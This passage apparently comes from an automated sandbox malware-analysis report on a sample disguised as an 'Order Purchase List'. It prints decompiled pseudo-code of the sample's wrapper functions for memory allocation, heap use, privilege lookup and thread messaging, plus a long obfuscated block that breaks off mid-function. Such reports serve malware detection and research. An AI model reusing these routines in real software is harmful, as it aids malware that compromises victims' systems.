NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a7fcf47da037be7e9456cd9548bddf61e73e5b3801b77c4638da0012dd1dea36
Instruction ID: 0b1102f9643000783a93479c972c01997cead1655d45cb6d468c59136dbfc457
Opcode Fuzzy Hash: a7fcf47da037be7e9456cd9548bddf61e73e5b3801b77c4638da0012dd1dea36
Instruction Fuzzy Hash: 1CF0F2B6200219ABDB18DF89DC85EEB77ADAF88754F158159FE1897242C630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187df
0x004187e7
0x00418809
0x0041880d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041871A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041871A(void* __edx, void* __edi, intOrPtr _a3, void* _a7) {
				long _t11;

				_t8 = _a3;
				_t5 = _t8 + 0x10; // 0x300
				_t6 = _t8 + 0xc50; // 0x409773
				E004191F0(__edi, _a3, _t6,  *_t5, 0, 0x2c);
				_t11 = NtClose(_a7); // executed
				return _t11;
			}

0x00418723
0x00418726
0x0041872f
0x00418737
0x00418745
0x00418749

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4c9aa5a8c3fd6b91dafd6044fb2f87fe13b6e1ce7f62f0dc267f75646e749436
Instruction ID: f0132b64245bc20d604c56c4bf908407b35f35b6fedb34f02f719d5c3b5e342b
Opcode Fuzzy Hash: 4c9aa5a8c3fd6b91dafd6044fb2f87fe13b6e1ce7f62f0dc267f75646e749436
Instruction Fuzzy Hash: 99E08C71200110BBD710DFA88C89FE77B28EF88220F044199BA189B242C631E55086D0

Uniqueness

Uniqueness Score: -1.00%

Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418723
0x00418726
0x0041872f
0x00418737
0x00418745
0x00418749

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088E0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088E0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E30(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407040( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A100( &_v284, 0x104);
						E0041A770( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407070( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070F0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088eb
0x004088f3
0x004088f5
0x004088fa
0x004088ff
0x00408912
0x00408917
0x00408920
0x0040892c
0x0040893f
0x00408944
0x00408947
0x00408950
0x00408962
0x00408967
0x0040896c
0x00000000
0x00000000
0x0040896e
0x00408972
0x00000000
0x00000000
0x00408974
0x00000000
0x00408972
0x00408976
0x00408979
0x0040897f
0x00408981
0x0040898c
0x00408991
0x00408994
0x004089a1
0x004089ac
0x004089ae
0x004089b4
0x004089b8
0x004089bb
0x004089bb
0x004089c2
0x004089c5
0x004089ca
0x004089d7
0x00408906
0x00408906
0x00408906

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188d7
0x004188e2
0x004188ed
0x004188f1

APIs

RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED

Strings

F5A, xrefs: 004188E2, 004188EC

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: F5A
API String ID: 1279760036-683449296
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407313, Relevance: 1.7, APIs: 1, Instructions: 178
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00407313(void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v656;
				intOrPtr _v668;
				char _v688;
				intOrPtr _v692;
				void* _t61;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t82;
				void* _t86;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t113;
				intOrPtr _t114;
				void* _t123;
				void* _t125;
				void* _t132;

				asm("adc ch, 0x43");
				_t113 = __esi - 1;
				asm("popfd");
				asm("loopne 0xffffffb4");
				_push(_t85);
				_push(_t113);
				_v12 = 0;
				_v692 = 0;
				E0041A150( &_v688, 0, 0x2a4);
				_t114 = _a12;
				_t109 = _v0;
				E00407290(_t132, _v0,  *((intOrPtr*)(_t114 + 0x300))); // executed
				_t125 = _t123 - 0x2ac + 0x14;
				_t61 = E004199E0( *((intOrPtr*)(_t114 + 0x300)));
				_t9 =  *((intOrPtr*)(_t114 + 0x2d4)) + 0x29000; // 0x29000
				_t86 = _t61 + _t9;
				_a12 = 0;
				while(1) {
					E0040D3E0(_t109, 0xfe363c80); // executed
					_t64 = E00418790(_t109,  *((intOrPtr*)(_t114 + 0x2f4)), _t86,  &_v688, 0x2a8, 0); // executed
					_t125 = _t125 + 0x20;
					 *((intOrPtr*)(_t114 + 0x2dc)) = _t64;
					if(_t64 < 0) {
						break;
					}
					if(_v656 == 0 || _v668 == 0 || _v136 == 0 || _v132 == 0) {
						_t67 = _a16 + 1;
						_a16 = _t67;
						if(_t67 < 2) {
							continue;
						} else {
							_t88 = _v8;
							goto L11;
						}
					} else {
						_t88 = 1;
						E0041A0D0(_a12,  &_v688, 0x2a8);
						_t125 = _t125 + 0xc;
						L11:
						E00418720(_t109,  *((intOrPtr*)(_t114 + 0x2f4))); // executed
						if(_t88 == 0) {
							break;
						} else {
							 *((intOrPtr*)(_a12 + 0x14)) = _v668;
							_t29 = _t114 + 0x2e8; // 0x2e8
							 *_t29 = _v136;
							_t31 = _t114 + 0x314; // 0x314
							_t89 = _t31;
							 *_t89 = 0x18;
							 *((intOrPtr*)(_t114 + 0x318)) = 0;
							 *((intOrPtr*)(_t114 + 0x320)) = 0;
							 *((intOrPtr*)(_t114 + 0x31c)) = 0;
							 *((intOrPtr*)(_t114 + 0x324)) = 0;
							 *((intOrPtr*)(_t114 + 0x328)) = 0;
							_t73 = E00417FA0(_t109, _a12 + 0x220,  *((intOrPtr*)(_t114 + 0x2d0)), _t89, _t29);
							 *((intOrPtr*)(_t114 + 0x2dc)) = _t73;
							if(_t73 < 0) {
								break;
							} else {
								_t39 = _t114 + 0x2e0; // 0x2e0
								 *((intOrPtr*)(_t114 + 0x318)) = 0;
								 *((intOrPtr*)(_t114 + 0x320)) = 0;
								 *((intOrPtr*)(_t114 + 0x31c)) = 0;
								 *((intOrPtr*)(_t114 + 0x324)) = 0;
								 *((intOrPtr*)(_t114 + 0x328)) = 0;
								_t99 = _a12 + 0x224;
								 *((intOrPtr*)(_t114 + 0x2e4)) = _v132;
								 *_t89 = 0x18;
								 *((intOrPtr*)(_t114 + 0x2d0)) = 0x1a;
								_t75 = E00417FE0(_t109, _a12 + 0x224, 0x1a, _t89, _t39);
								 *((intOrPtr*)(_t114 + 0x2dc)) = _t75;
								if(_t75 < 0) {
									break;
								} else {
									_t54 = E0041A3C0( *((intOrPtr*)(E004196A0(0, E00419680(_t99)) + 0x28))) + 2; // 0x2
									E0041A0D0( *((intOrPtr*)(_a8 + 0x10)) + 0x200,  *((intOrPtr*)(_t77 + 0x28)), _t79 + _t54);
									_t82 = E00413A60(_t109,  &_v656, 2, 0); // executed
									return _t82;
								}
							}
						}
					}
					L15:
				}
				__eflags = 0;
				return 0;
				goto L15;
			}

0x00407313
0x0040731c
0x0040731d
0x0040731e
0x00407329
0x0040732a
0x00407334
0x00407337
0x00407344
0x00407349
0x00407352
0x00407357
0x0040735c
0x0040735f
0x0040736a
0x0040736a
0x00407371
0x00407380
0x00407386
0x004073a2
0x004073a7
0x004073aa
0x004073b2
0x00000000
0x00000000
0x004073bc
0x004073d9
0x004073da
0x004073e0
0x00000000
0x004073e2
0x004073e2
0x00000000
0x004073e2
0x004073f0
0x00407400
0x00407405
0x0040740a
0x0040740d
0x00407415
0x0040741f
0x00000000
0x00407421
0x00407430
0x00407439
0x00407440
0x00407445
0x00407445
0x00407456
0x0040745c
0x00407462
0x00407468
0x0040746e
0x00407474
0x0040747a
0x00407484
0x0040748c
0x00000000
0x00407492
0x00407495
0x0040749c
0x004074a2
0x004074a8
0x004074ae
0x004074b4
0x004074c0
0x004074c8
0x004074ce
0x004074d4
0x004074de
0x004074e6
0x004074ee
0x00000000
0x004074f4
0x0040751b
0x00407522
0x00407533
0x00407541
0x00407541
0x004074ee
0x0040748c
0x0040741f
0x00000000
0x004073bc
0x004073e9
0x004073ef
0x00000000

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d26555b3d73cabb215d2d8ea9ffb1d7f91d59228ee88797864ce60a87e53bc5c
Instruction ID: 96d9cf456a23ca70d715dd3101c5aad66ffcbef7e238b83a71237143956e7880
Opcode Fuzzy Hash: d26555b3d73cabb215d2d8ea9ffb1d7f91d59228ee88797864ce60a87e53bc5c
Instruction Fuzzy Hash: 9D61C470A00305AFD714DF55DC85BEB77A8EB44304F10446EF959A7281DB74B941CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407290
0x0040729f
0x004072a3
0x004072ae
0x004072be
0x004072ce
0x004072d3
0x004072da
0x004072dd
0x004072ea
0x004072ec
0x004072ee
0x0040730b
0x0040730b
0x00000000
0x0040730d
0x00407312

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA

Uniqueness

Uniqueness Score: -1.00%

Function 004188F4, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004188F4(void* __ecx, void* __edx, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				intOrPtr _v117;
				char _t14;
				void* _t21;

				asm("ficom dword [eax-0x40b74411]");
				asm("out dx, eax");
				asm("cmpsb");
				_v117 = _v117 - __edx;
				_t11 = _a8;
				_t5 = _t11 + 0xc74; // 0xc74
				E004191F0(_t21, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t14;
			}

0x004188f5
0x004188fd
0x004188fe
0x004188ff
0x00418903
0x0041890f
0x00418917
0x0041892d
0x00418931

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e524f0364c526cb56da02293c0cb6e8b1287fcdf62ac2d8fec42ccd86ad49f2a
Instruction ID: 2f9c997de783ff4cbd25a8b042c99e91554636a3dcb3ae642e08bd5c5158753f
Opcode Fuzzy Hash: e524f0364c526cb56da02293c0cb6e8b1287fcdf62ac2d8fec42ccd86ad49f2a
Instruction Fuzzy Hash: C4E06DB12142046FDB24EF7ACC59ED77BA8AF48350F118599FD09DB252D631E814CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041890f
0x00418917
0x0041892d
0x00418931

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a7a
0x00418a90
0x00418a94

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418943
0x0041895a
0x00418968

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041BCF2, Relevance: 4.3, Strings: 3, Instructions: 520
COMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E0041BCF2() {
				signed int _t102;
				signed char _t103;
				signed int _t105;
				signed char _t113;
				signed char _t121;
				signed int _t122;
				signed int _t123;
				void* _t125;
				void* _t126;
				signed int _t129;
				signed int _t132;
				signed int _t137;
				signed int _t139;

				asm("adc esi, [0xff3fb7e9]");
				asm("adc esi, 0x7657392f");
				_pop(_t129);
				_t123 = _t122 ^ 0xa02788a9;
				_t103 = _t102 |  *0x4d0f356f;
				_t132 =  *0xafa43f6b * 0x3fee;
				_push(_t103);
				if(_t132 > 0) {
					__ecx = __ecx -  *0xbe24c776;
					__eflags = __ecx;
					if(__ecx == 0) {
						_t33 = __ecx;
						__ecx =  *0xc0311175;
						 *0xc0311175 = _t33;
						 *0x190e0a9d =  *0x190e0a9d >> 0x6e;
						asm("adc bh, 0x2c");
						__ebp = __ebp + 0x8c0a74f3;
						asm("sbb [0x83f6fa6e], edi");
						asm("sbb ebx, [0x75568dd3]");
						asm("adc [0x79008c12], cl");
						__eflags = __dh -  *0x3d350ce4;
						__esp = __esi;
						asm("rol dword [0x101d5098], 0x66");
						asm("adc ebp, 0x884c77d4");
						__eflags =  *0xd52d1808 - __ah;
						asm("sbb dl, 0x1c");
						 *0x7c2ea732 =  *0x7c2ea732 | __bh;
						__bh = __bh ^ 0x00000018;
						__ebx = __ebx + 1;
						__ebp = __ebp - 1;
						__al = __al ^ 0x000000b3;
						__ebx =  *0xeaa43e9a;
						asm("ror byte [0x7e8ebeb1], 0x58");
						__edi = __edi + 1;
						 *0xc71486f4 =  *0xc71486f4 & __ecx;
						asm("sbb dl, [0x7d30a1d7]");
						__ecx = __ecx & 0x4a99f213;
						__bh = __bh +  *0xb27c0e80;
						_push(__ebx);
						__dh = __dh -  *0xa182d0c;
						_push(__ebx);
						asm("rcl dword [0xe4b5a06c], 0x3e");
						__bl = __bl -  *0x4b9d8bb5;
						_push(__ebx);
						asm("adc edx, 0xebcd4393");
						__bl = __bl & 0x0000008a;
						__ebp = __ebp + 1;
						__eflags = __ebp;
						if(__ebp >= 0) {
							 *0x4812ff72 =  *0x4812ff72 ^ __eax;
							__ebx = 0x6cb02f8d;
							asm("sbb ah, [0x3c0f8db1]");
							 *0x9bc13822 =  *0x9bc13822 + __bl;
							__eflags = __bh -  *0xb7052863;
							__bl = __bl -  *0xd7a4e300;
							_push( *0xecfecb05);
							asm("lodsb");
							 *0xdea305d7 =  *0xdea305d7 ^ __bh;
							 *0x5d78fbc =  *0x5d78fbc + __ebp;
							asm("adc edx, [0xa3d6d99b]");
							__bl = __bl | 0x000000d7;
							asm("sbb ebp, 0xdae67b05");
							asm("movsw");
							asm("rcr byte [0xc75b05d7], 0xdc");
							asm("sbb ebp, [0x3d795be]");
							 *0x40bce88 =  *0x40bce88 & __ch;
							__eflags =  *0x938b7e80 & __dh;
							 *0x88e73404 =  *0x88e73404 >> 0xba;
							asm("sbb [0xdd720493], eax");
							asm("adc edi, [0x1504938e]");
							 *0x59390dc =  *0x59390dc >> 0x22;
							__ch = __ch ^  *0x99e126b0;
							__bl = 0xd7;
							 *0xb2de2005 =  *0xb2de2005 | __ecx;
							asm("adc esi, [0x6905d78f]");
							__eflags = __eax - 0xd791bbd8;
							 *0xaffc5007 =  *0xaffc5007 << 0xd9;
							__ecx = __ecx - 1;
							__ebp = __ebp & 0x0783fdd4;
							__ch =  *0x4295cff6;
							__esi = __esi ^ 0x0783fbd9;
							__ecx = __ecx + 0x78221609;
							__bl =  *0x783f9d7;
							_push(__esp);
							__eflags =  *0x9aeb826f & __esi;
							asm("sbb edi, 0xae088301");
							 *0xcd5df400 & __dh = __esi & 0x08b15c19;
							__eflags = __al & 0x00000088;
							__ch =  *0x4295cff6 & 0x00000038;
							__edi = __edi - 1;
							__ecx =  *0x46cc4060 * 0x8b1;
							__edx = __edx - 1;
							 *0xc21d9d00 - __ah = __esi - 0x8b1531f;
							__eax = __eax - 1;
							__eflags =  *0x6c928fb0 & __ch;
							__cl = __cl ^ 0x000000e0;
							__edx = __edx - 1;
							asm("adc [0x2cbd09b1], al");
							__bh = __bh |  *0x2393ca0c;
							 *0x91e019e & __esi =  *0x321b0e62 & __ecx;
							__eflags = __al & 0x000000c9;
							 *0x1e19c117 =  *0x1e19c117 << 0xf5;
							__eflags =  *0x6dd08a09 - __ecx;
							asm("adc [0x88d35e93], eax");
							__ecx = __ecx ^ 0x160a1efe;
							__eflags = __ecx;
							L1();
							asm("adc esp, [0x2e65e2e8]");
							asm("sbb [0x5d5b5c2b], ecx");
							if(__ecx < 0) {
								 *0x67bf0b71 =  *0x67bf0b71 | __edx;
								 *0x71436a64 = __edi;
								__dl = __dl &  *0xf434ac3a;
								 *0x960a08f0 = __eax;
								_pop(__esp);
								__eflags = __ch -  *0x521dc612;
								asm("sbb ch, 0xb1");
								 *0xb7d48611 =  *0xb7d48611 >> 0xdd;
								_t52 = __ah;
								__ah =  *0xb6edad28;
								 *0xb6edad28 = _t52;
								__eflags =  *0xc8ec031 & __edi;
								asm("lodsd");
								if(( *0xc8ec031 & __edi) < 0) {
									 *0xded5d07d * 0x143c =  *0xded5d07d * 0x143c - 1;
									asm("adc cl, 0x38");
									__eflags =  *0x1886bde0 & __dh;
									_t57 = __esi;
									__esi =  *0xd998e9d;
									 *0xd998e9d = _t57;
									__eflags = __ch & 0x00000032;
									asm("sbb ah, [0x3b5354b2]");
